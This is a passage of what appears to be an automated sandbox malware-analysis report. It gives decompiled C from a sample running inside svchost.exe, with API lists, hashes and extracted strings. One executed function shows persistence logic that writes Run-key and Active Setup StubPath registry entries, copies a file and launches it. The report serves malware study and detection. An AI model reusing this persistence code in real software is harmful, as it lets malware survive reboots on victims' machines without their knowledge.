				if( *0x1000f610 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x1000f610; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x1000f5fc)) = 0x1000f5f8;
					 *0x1000f5f8 = 0x1000f5f8;
					 *0x1000f604 = 0x1000f5f8;
					 *0x1000f5b0 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E100018FD);
				if( *0x1000f039 != 0) {
					_push(0x1000f5b8);
					L100011A4();
					return 0;
				}
				return 0;
			}

0x10001845
0x10001846
0x1000184b
0x1000184e
0x10001851
0x10001856
0x10001862
0x10001864
0x10001869
0x10001869
0x10001873
0x1000187d
0x10001887
0x10001898
0x100018a4
0x100018a6
0x100018ab
0x100018ab
0x100018b3
0x100018b7
0x100018b8
0x100018c4
0x100018c7
0x100018c9
0x100018ce
0x100018ce
0x100018d7
0x100018da
0x100018dd
0x100018e9
0x100018eb
0x100018f0
0x00000000
0x100018f0
0x100018f5

APIs

RtlInitializeCriticalSection.KERNEL32(1000F5B8,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10001856
RtlEnterCriticalSection.KERNEL32(1000F5B8,1000F5B8,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10001869
LocalAlloc.KERNEL32(00000000,00000FF8,1000F5B8,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10001893
RtlLeaveCriticalSection.KERNEL32(1000F5B8,100018FD,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 100018F0

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 1f0f36669ccd89084293deb5fed76b485fb911eb23b4b8d51be7619dbd263ba8
Instruction ID: dccb1d46fb8802896221657e2b19eaefe2a155e583b8e496b0545f4226b1fe46
Opcode Fuzzy Hash: 1f0f36669ccd89084293deb5fed76b485fb911eb23b4b8d51be7619dbd263ba8
Instruction Fuzzy Hash: 1101C0B49046909EF706DF688C417F83A95EB493C2F84807DE31086EAECF755541E715

Uniqueness

Uniqueness Score: -1.00%

Function 10005E30, Relevance: 6.0, APIs: 4, Instructions: 48
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005E30(WCHAR* __eax, void** __edx) {
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				WCHAR* _t20;
				void* _t21;
				void** _t25;

				_t25 = __edx;
				_t20 = __eax;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)(__edx)) = 0;
				if(E10005CA4(__eax) != 0) {
					_t21 = CreateFileW(_t20, 0x80000000, 1, 0, 3, 0, 0);
					_v20 = GetFileSize(_t21, 0);
					_v16 = 0;
					 *_t25 = E10002500(_v20);
					ReadFile(_t21,  *_t25, _v20,  &_v12, 0);
					CloseHandle(_t21);
				}
				return _v20;
			}

0x10005e35
0x10005e37
0x10005e39
0x10005e40
0x10005e4a
0x10005e55
0x10005e6c
0x10005e78
0x10005e7b
0x10005e87
0x10005e99
0x10005e9f
0x10005e9f
0x10005eb0

APIs

Part of subcall function 10005CA4: FindFirstFileW.KERNEL32(00000000,?,00000000,1000D3CA,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005CAF
Part of subcall function 10005CA4: FindClose.KERNEL32(00000000,00000000,?,00000000,1000D3CA,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005CBC

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E67
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E71
ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E99
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E9F

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseFind$CreateFirstHandleReadSize
String ID:
API String ID: 2300874643-0
Opcode ID: a79ddd87b365fe7b2d14b4ed1ecc161be50d9f5a748904592efd46580eade151
Instruction ID: ec1664e735d5352034fe0f720539986a8c554a57553e37fb55f78792c2cbbe85
Opcode Fuzzy Hash: a79ddd87b365fe7b2d14b4ed1ecc161be50d9f5a748904592efd46580eade151
Instruction Fuzzy Hash: 7701FBB4204300AFF750DF68DC82F5BB7D8DF48740F118929B6C8DB2D6EAB5A8408756

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF04, Relevance: 6.0, APIs: 4, Instructions: 42
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CF04(WCHAR* __eax, void* __edx) {
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				WCHAR* _t16;
				void* _t17;
				void* _t21;

				_t21 = __edx;
				_t16 = __eax;
				_v20 = 0;
				_v16 = 0;
				if(E10005CA4(__eax) != 0) {
					_t17 = CreateFileW(_t16, 0x80000000, 1, 0, 3, 0, 0);
					_v20 = GetFileSize(_t17, 0);
					_v16 = 0;
					ReadFile(_t17, _t21, _v20,  &_v12, 0);
					CloseHandle(_t17);
				}
				return _v20;
			}

0x1000cf09
0x1000cf0b
0x1000cf0d
0x1000cf14
0x1000cf25
0x1000cf3c
0x1000cf48
0x1000cf4b
0x1000cf5d
0x1000cf63
0x1000cf63
0x1000cf74

APIs

Part of subcall function 10005CA4: FindFirstFileW.KERNEL32(00000000,?,00000000,1000D3CA,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005CAF
Part of subcall function 10005CA4: FindClose.KERNEL32(00000000,00000000,?,00000000,1000D3CA,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005CBC

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 1000CF37
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 1000CF41
ReadFile.KERNEL32(00000000,10012588,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 1000CF5D
CloseHandle.KERNEL32(00000000,00000000,10012588,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 1000CF63

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseFind$CreateFirstHandleReadSize
String ID:
API String ID: 2300874643-0
Opcode ID: 03f9f7659b597f388d1b5840c8977d6936cd9482a483ede27655747325d3c647
Instruction ID: 0a6ea64837ac90d6558c1ae8266d2dbde50220b88be3e9169680d92fb0307424
Opcode Fuzzy Hash: 03f9f7659b597f388d1b5840c8977d6936cd9482a483ede27655747325d3c647
Instruction Fuzzy Hash: 54F012B42443007EF710DB689CC2F5B77DDDF84790F118929B6889B2C6DAB5A8008756

Uniqueness

Uniqueness Score: -1.00%

Function 10006024, Relevance: 6.0, APIs: 4, Instructions: 23
windowsleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10006024(struct tagMSG* __eax) {
				int _t6;
				MSG* _t7;

				_t7 = __eax;
				_t6 = 0;
				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
					_t6 = 1;
					TranslateMessage(_t7);
					DispatchMessageA(_t7);
				}
				Sleep(5);
				return _t6;
			}

0x10006026
0x10006028
0x1000603a
0x1000603c
0x1000603f
0x10006045
0x10006045
0x1000604c
0x10006055

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 10006033
TranslateMessage.USER32 ref: 1000603F
DispatchMessageA.USER32 ref: 10006045
Sleep.KERNEL32(00000005,?,?,10006062), ref: 1000604C

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Message$DispatchPeekSleepTranslate
String ID:
API String ID: 3768732053-0
Opcode ID: cdfd25f36f656fbcf1ff338a95777bde3114a2653ddc5fdf0504e6a1debc9aed
Instruction ID: b6454b735261936b655b95e10bb9b448ccac05162160f127df45d4e102083895
Opcode Fuzzy Hash: cdfd25f36f656fbcf1ff338a95777bde3114a2653ddc5fdf0504e6a1debc9aed
Instruction Fuzzy Hash: 8AD052B53C2A253AF520A1A00C83FAF004DCF02BC6F220030B700BA0CACE867C0102AE

Uniqueness

Uniqueness Score: -1.00%

Function 100020BC, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E100020BC(void* __eax) {
				intOrPtr _v8;
				void* __ebp;
				signed int* _t24;
				signed int* _t25;
				intOrPtr _t26;
				signed int* _t38;
				void* _t42;
				signed int _t43;
				signed int _t44;
				signed int _t51;
				intOrPtr _t52;
				signed int _t56;
				signed int* _t58;
				signed int* _t62;
				intOrPtr _t65;
				intOrPtr _t67;

				_t65 = _t67;
				_t42 = __eax;
				 *0x1000f5b4 = 0;
				if( *0x1000f5b0 != 0 || E10001840() != 0) {
					_push(_t65);
					_push("�u");
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t67;
					__eflags =  *0x1000f039;
					if( *0x1000f039 != 0) {
						_push(0x1000f5b8);
						L1000119C();
					}
					_t62 = _t42 - 4;
					_t43 =  *_t62;
					__eflags = _t43 & 0x00000002;
					if((_t43 & 0x00000002) != 0) {
						 *0x1000f5a0 =  *0x1000f5a0 - 1;
						 *0x1000f5a4 =  *0x1000f5a4 - (_t43 & 0x7ffffffc) - 4;
						__eflags = _t43 & 0x00000001;
						if((_t43 & 0x00000001) == 0) {
							L14:
							_t44 = _t43 & 0x7ffffffc;
							_t24 = _t62 + _t44;
							_t58 = _t24;
							__eflags = _t58 -  *0x1000f60c; // 0x0
							if(__eflags != 0) {
								_t51 =  *_t24;
								__eflags = _t51 & 0x00000002;
								if((_t51 & 0x00000002) == 0) {
									_t25 = _t58;
									__eflags = _t25[1];
									if(_t25[1] == 0) {
										L25:
										 *0x1000f5b4 = 0xb;
									} else {
										__eflags =  *_t25;
										if( *_t25 == 0) {
											goto L25;
										} else {
											__eflags = _t25[2] - 0xc;
											if(_t25[2] >= 0xc) {
												__eflags = _t44;
												E100019E4(_t25);
												goto L27;
											} else {
												goto L25;
											}
										}
									}
								} else {
									__eflags = (_t51 & 0x7ffffffc) - 4;
									if((_t51 & 0x7ffffffc) >= 4) {
										 *_t24 =  *_t24 | 0x00000001;
										L27:
										E10001C4C(_t62, _t44);
									} else {
										 *0x1000f5b4 = 0xb;
									}
								}
								goto L28;
							} else {
								 *0x1000f60c =  *0x1000f60c - _t44;
								 *0x1000f608 =  *0x1000f608 + _t44;
								__eflags =  *0x1000f608 - 0x3c00;
								if( *0x1000f608 > 0x3c00) {
									E10001CD4(_t24);
								}
								_v8 = 0;
								E10002D84();
								goto L32;
							}
						} else {
							_t56 =  *(_t62 - 0xc + 8);
							__eflags = _t56 - 0xc;
							if(_t56 < 0xc) {
								L10:
								 *0x1000f5b4 = 0xa;
								goto L28;
							} else {
								__eflags = _t56 & 0x80000003;
								if((_t56 & 0x80000003) == 0) {
									_t38 = _t62 - _t56;
									__eflags = _t56 - _t38[2];
									if(_t56 == _t38[2]) {
										_t43 = _t43 + _t56;
										__eflags = _t43;
										_t62 = _t38;
										E100019E4(_t38);
										goto L14;
									} else {
										 *0x1000f5b4 = 0xa;
										goto L28;
									}
								} else {
									goto L10;
								}
							}
						}
					} else {
						 *0x1000f5b4 = 9;
						L28:
						_t26 =  *0x1000f5b4; // 0x0
						_v8 = _t26;
						__eflags = 0;
						_pop(_t52);
						 *[fs:eax] = _t52;
						_push(E10002255);
						__eflags =  *0x1000f039;
						if( *0x1000f039 != 0) {
							_push(0x1000f5b8);
							L100011A4();
							return 0;
						}
						return 0;
					}
				} else {
					 *0x1000f5b4 = 8;
					_v8 = 8;
					L32:
					return _v8;
				}
			}

0x100020bd
0x100020c3
0x100020c7
0x100020d3
0x100020f6
0x100020f7
0x100020fc
0x100020ff
0x10002102
0x10002109
0x1000210b
0x10002110
0x10002110
0x10002117
0x1000211a
0x1000211c
0x1000211f
0x10002130
0x10002140
0x10002146
0x10002149
0x10002190
0x10002190
0x10002198
0x1000219a
0x1000219c
0x100021a2
0x100021d0
0x100021d2
0x100021d5
0x100021f3
0x100021f5
0x100021f9
0x10002206
0x10002206
0x100021fb
0x100021fb
0x100021fe
0x00000000
0x10002200
0x10002200
0x10002204
0x10002215
0x10002217
0x00000000
0x00000000
0x00000000
0x00000000
0x10002204
0x100021fe
0x100021d7
0x100021dd
0x100021e0
0x100021ee
0x1000221c
0x10002220
0x100021e2
0x100021e2
0x100021e2
0x100021e0
0x00000000
0x100021a4
0x100021a4
0x100021aa
0x100021b0
0x100021ba
0x100021bc
0x100021bc
0x100021c3
0x100021c6
0x00000000
0x100021c6
0x1000214b
0x10002150
0x10002153
0x10002156
0x10002160
0x10002160
0x00000000
0x10002158
0x10002158
0x1000215e
0x10002171
0x10002173
0x10002176
0x10002187
0x10002187
0x10002189
0x1000218b
0x00000000
0x10002178
0x10002178
0x00000000
0x10002178
0x00000000
0x00000000
0x00000000
0x1000215e
0x10002156
0x10002121
0x10002121
0x10002225
0x10002225
0x1000222a
0x1000222d
0x1000222f
0x10002232
0x10002235
0x1000223a
0x10002241
0x10002243
0x10002248
0x00000000
0x10002248
0x1000224d
0x1000224d
0x100020de
0x100020de
0x100020e8
0x10002255
0x1000225d
0x1000225d

APIs

RtlEnterCriticalSection.KERNEL32(1000F5B8,00000000,u,?,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10002110
RtlLeaveCriticalSection.KERNEL32(1000F5B8,10002255,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10002248

Part of subcall function 10001840: RtlInitializeCriticalSection.KERNEL32(1000F5B8,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10001856
Part of subcall function 10001840: RtlEnterCriticalSection.KERNEL32(1000F5B8,1000F5B8,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10001869
Part of subcall function 10001840: LocalAlloc.KERNEL32(00000000,00000FF8,1000F5B8,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10001893
Part of subcall function 10001840: RtlLeaveCriticalSection.KERNEL32(1000F5B8,100018FD,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 100018F0

Strings

u, xrefs: 100020F7

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: u
API String ID: 2227675388-1454174257
Opcode ID: 0da6072e0a976cfb3f921da88b49d252e3528e262072c21df3c45306adc3dbea
Instruction ID: 561d0a3fabbc271b0414227351a2afb4dd9cd87895bc161ef682a7dca5e6893d
Opcode Fuzzy Hash: 0da6072e0a976cfb3f921da88b49d252e3528e262072c21df3c45306adc3dbea
Instruction Fuzzy Hash: 8E413436A04660EFF311CFA4CD897A937E5EB443D4F24812DEA0087ABEC7349884E701

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 3652 Parent PID: 6908 svchost.exeCOMMON

Executed Functions

Function 1000C9D0, Relevance: 21.5, Strings: 17, Instructions: 235
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E1000C9D0(intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char* _v80;
				char _v84;
				char _v88;
				void* _t103;
				void* _t115;
				void* _t117;
				void* _t119;
				intOrPtr _t151;
				void* _t152;
				char* _t178;
				void* _t188;
				void* _t191;
				void* _t192;
				void* _t193;
				intOrPtr _t195;

				_t152 = 0xa;
				goto L1;
				while(1) {
					L5:
					_t199 =  *((char*)(_t151 + 0xdbc)) - 1;
					if( *((char*)(_t151 + 0xdbc)) == 1) {
						E100038E0( &_v76, 0x3d, _t151 + 0xc4e);
						E1000577C(0x80000002, _t151, _v76, _v28, _t192, _t199, 2, _v16);
					}
					_t200 =  *((char*)(_t151 + 0xdbd)) - 1;
					if( *((char*)(_t151 + 0xdbd)) == 1) {
						E100038E0( &_v80, 0x3d, _t151 + 0xcc8);
						_t164 = _v80;
						E1000577C(0x80000001, _t151, _v80, _v28, _t192, _t200, 2, _v16);
					}
					_t201 =  *((char*)(_t151 + 0xdbe)) - 1;
					if( *((char*)(_t151 + 0xdbe)) == 1) {
						_push(E1000390C(_v20));
						_push(0x80000001);
						L1000C070();
						_t164 = L"StubPath";
						E1000577C(0x80000002, _t151, L"StubPath", _v20, _t192, _t201, 2, _v16);
					}
					_t191 = E1000390C(_v16);
					_t115 = E10005CA4(_t191);
					_t202 = _t115;
					if(_t115 == 0) {
						E10005D78(_v16, _t151, _t164,  &_v84, _t191, _t192, _t202);
						if(E10005690(E1000390C(_v84)) != 0) {
							_push(_v40);
							_push(_v44);
							_t188 = E1000390C(_v24);
							E10005EB4(_t191, _t188);
							_t204 =  *((char*)(_t151 + 0xbd1)) - 1;
							if( *((char*)(_t151 + 0xbd1)) == 1) {
								E10005D78(_v16, _t151, _t164,  &_v88, _t191, _t192, _t204);
								E10005F1C(_v88, _t151, _t164, _t192);
								E10005F1C(_v16, _t151, _t164, _t192);
							}
						}
					}
					_t117 = E10004DF0(0, 0, _t151 + 0xfaa);
					_t193 = _t117;
					L10004E88();
					if(_t117 == 0xb7) {
						_push(_t193);
						L10004DC0();
					} else {
						_push(_t193);
						L10004DC0();
						_push(0);
						_push(0);
						_push(0);
						_push(_t191);
						_push(L"open");
						_push(0);
						L1000B6F8();
					}
					_push(0x1388);
					L10004F58();
					_t119 = E10004DF0(0, 0, _t151 + 0x1024);
					_t192 = _t119;
					L10004E88();
					if(_t119 != 0xb7) {
						_push(_t192);
						L10004DC0();
					} else {
						_push(0);
						L10004E38();
					}
				}
				L3:
				E100034B0( &_v56, 0x3d, _t151 + 0xfaa);
				E1000352C( &_v52, _v56, "SOFTWARE\\");
				E100038FC( &_v48, _v52);
				E1000553C(0x80000001, _t151, L"ServerName", _v48, _t192,  &_v16, 0);
				_push(0x3e8);
				L10004F58();
				E10003A34(_v16, 0);
				if(0 == 0) {
					goto L3;
				} else {
					E100034B0( &_v64, 0x3d, _t151 + 0xfaa);
					E1000352C( &_v60, _v64, "SOFTWARE\\");
					E100038FC( &_v8, _v60);
					E100037D0( &_v12, L"ServerName");
					_push(E1000390C(_v12));
					_push(E1000390C(_v8));
					_push(0x80000001);
					L1000C078();
					E100037D0( &_v28, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run");
					E100034B0( &_v72, 0x3d, _t151 + 0xd42);
					E1000352C( &_v68, _v72, "Software\\Microsoft\\Active Setup\\Installed Components\\");
					E100038FC( &_v20, _v68);
					_t103 = E1000390C(_v16);
					_t178 =  &_v32;
					_v44 = E10005E30(_t103, _t178);
					_v40 = _t178;
					E10003BE4( &_v24, E10003FD4(_v44, _v40, 2, 0));
					E100050D0(E1000390C(_v24), _v32);
					goto L5;
				}
				L1:
				_push(0);
				_push(0);
				_t152 = _t152 - 1;
				if(_t152 != 0) {
					goto L1;
				} else {
					_push(_t152);
					_push(_t192);
					_t151 = _a4;
					_push(0x1000cd6b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t195;
					_push("advapi32.dll"); // executed
					L10004EE8(); // executed
					_push("kernel32.dll");
					L10004EE8();
					_push("shell32.dll"); // executed
					L10004EE8(); // executed
					_push("mpr.dll"); // executed
					L10004EE8(); // executed
					_push("version.dll"); // executed
					L10004EE8(); // executed
					_push("comctl32.dll"); // executed
					L10004EE8(); // executed
					_push("gdi32.dll");
					L10004EE8();
					_push("opengl32.dll"); // executed
					L10004EE8(); // executed
					_push("user32.dll");
					L10004EE8();
					_push("wintrust.dll"); // executed
					L10004EE8(); // executed
					_push("msimg32.dll"); // executed
					L10004EE8(); // executed
					_push("shell32.dll");
					L10004EE8();
					E10004DF0(0, 0, _t151 + 0x109e); // executed
					goto L3;
				}
			}

0x1000c9d3
0x1000c9d3
0x1000cbac
0x1000cbac
0x1000cbac
0x1000cbb3
0x1000cbc9
0x1000cbd9
0x1000cbd9
0x1000cbde
0x1000cbe5
0x1000cbfb
0x1000cc00
0x1000cc0b
0x1000cc0b
0x1000cc10
0x1000cc17
0x1000cc21
0x1000cc22
0x1000cc27
0x1000cc32
0x1000cc3f
0x1000cc3f
0x1000cc4c
0x1000cc50
0x1000cc55
0x1000cc57
0x1000cc5f
0x1000cc73
0x1000cc75
0x1000cc78
0x1000cc86
0x1000cc87
0x1000cc8c
0x1000cc93
0x1000cc9b
0x1000cca3
0x1000ccab
0x1000ccab
0x1000cc93
0x1000cc73
0x1000ccbb
0x1000ccc0
0x1000ccc2
0x1000cccc
0x1000cce9
0x1000ccea
0x1000ccce
0x1000ccce
0x1000cccf
0x1000ccd4
0x1000ccd6
0x1000ccd8
0x1000ccda
0x1000ccdb
0x1000cce0
0x1000cce2
0x1000cce2
0x1000ccef
0x1000ccf4
0x1000cd04
0x1000cd09
0x1000cd0b
0x1000cd15
0x1000cd23
0x1000cd24
0x1000cd17
0x1000cd17
0x1000cd19
0x1000cd19
0x1000cd15
0x1000ca7c
0x1000ca90
0x1000caa0
0x1000caab
0x1000cabd
0x1000cac2
0x1000cac7
0x1000cad1
0x1000cad6
0x00000000
0x1000cad8
0x1000cae6
0x1000caf6
0x1000cb01
0x1000cb0e
0x1000cb1b
0x1000cb24
0x1000cb25
0x1000cb2a
0x1000cb37
0x1000cb4a
0x1000cb5a
0x1000cb65
0x1000cb6d
0x1000cb72
0x1000cb7a
0x1000cb7d
0x1000cb94
0x1000cba7
0x00000000
0x1000cba7
0x1000c9d8
0x1000c9d8
0x1000c9da
0x1000c9dc
0x1000c9dd
0x00000000
0x1000c9df
0x1000c9df
0x1000c9e1
0x1000c9e3
0x1000c9e9
0x1000c9ee
0x1000c9f1
0x1000c9f4
0x1000c9f9
0x1000c9fe
0x1000ca03
0x1000ca08
0x1000ca0d
0x1000ca12
0x1000ca17
0x1000ca1c
0x1000ca21
0x1000ca26
0x1000ca2b
0x1000ca30
0x1000ca35
0x1000ca3a
0x1000ca3f
0x1000ca44
0x1000ca49
0x1000ca4e
0x1000ca53
0x1000ca58
0x1000ca5d
0x1000ca62
0x1000ca67
0x1000ca77
0x00000000
0x1000ca77

Strings

ServerName, xrefs: 1000CAB3, 1000CB09
mpr.dll, xrefs: 1000CA12
open, xrefs: 1000CCDB
advapi32.dll, xrefs: 1000C9F4
msimg32.dll, xrefs: 1000CA58
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000CB32
wintrust.dll, xrefs: 1000CA4E
comctl32.dll, xrefs: 1000CA26
SOFTWARE\, xrefs: 1000CA9B, 1000CAF1
StubPath, xrefs: 1000CC32
gdi32.dll, xrefs: 1000CA30
Software\Microsoft\Active Setup\Installed Components\, xrefs: 1000CB55
kernel32.dll, xrefs: 1000C9FE
user32.dll, xrefs: 1000CA44
shell32.dll, xrefs: 1000CA08, 1000CA62
version.dll, xrefs: 1000CA1C
opengl32.dll, xrefs: 1000CA3A

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: SOFTWARE\$ServerName$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath$advapi32.dll$comctl32.dll$gdi32.dll$kernel32.dll$mpr.dll$msimg32.dll$open$opengl32.dll$shell32.dll$user32.dll$version.dll$wintrust.dll
API String ID: 0-1620131929
Opcode ID: 3f003b5c3092192cfd81708055f069769660bd1ffedbc504d52b734bcf9630d0
Instruction ID: 2f4b2620837c28cfdf5e49335ff29dada521f5c21c6ac21027946eb6f57ed48d
Opcode Fuzzy Hash: 3f003b5c3092192cfd81708055f069769660bd1ffedbc504d52b734bcf9630d0
Instruction Fuzzy Hash: 20911F78A4024DABFB01EBA4D882FDE7779EF442C1F118162F9046B28ECB75BD058765

Uniqueness

Uniqueness Score: -1.00%

Function 100034B0, Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f70b2c41885a2b75705e30fc840686dfb1265623bc9199f295252585e81511e0
Instruction ID: 0d43bb01e54dc9b671ab70bbc6831eaed9bab68177c8673266180e336cb24133
Opcode Fuzzy Hash: f70b2c41885a2b75705e30fc840686dfb1265623bc9199f295252585e81511e0
Instruction Fuzzy Hash: 9211E135B0864657F323C969ACC086BA3CEDFC41E0B14C439B964C734ADEA9ED099241

Uniqueness

Uniqueness Score: -1.00%

Function 100014EC, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 658d5346f56e2b90820d1a4238b762dd8e40d303793816f207723b6d5c2275ec
Instruction ID: 376a20137c8c7a1c0fe805d4ca5c7b4e53bfabd2decc6611af020c1a5c038b4e
Opcode Fuzzy Hash: 658d5346f56e2b90820d1a4238b762dd8e40d303793816f207723b6d5c2275ec
Instruction Fuzzy Hash: 42117076A05B029BE310DF19CC80A9AB7E1EBC47D2F15C52CE6894B759D630EC408A81

Uniqueness

Uniqueness Score: -1.00%

Function 10001358, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d51b0ecb197f6104a2e181751b16b33db407c9c73752bb5c84ac1d3e4f38b51
Instruction ID: a9c88282e432f8f48e60550f2442f7a71b9eebfe68f090cfd9eaf30bd27f6b92
Opcode Fuzzy Hash: 9d51b0ecb197f6104a2e181751b16b33db407c9c73752bb5c84ac1d3e4f38b51
Instruction Fuzzy Hash: 82F0A7B6B0062027F730C9694C81BCA66C5DF86BE1F154270FF48EF7CEDA619C0082A0

Uniqueness

Uniqueness Score: -1.00%

Function 100033C0, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

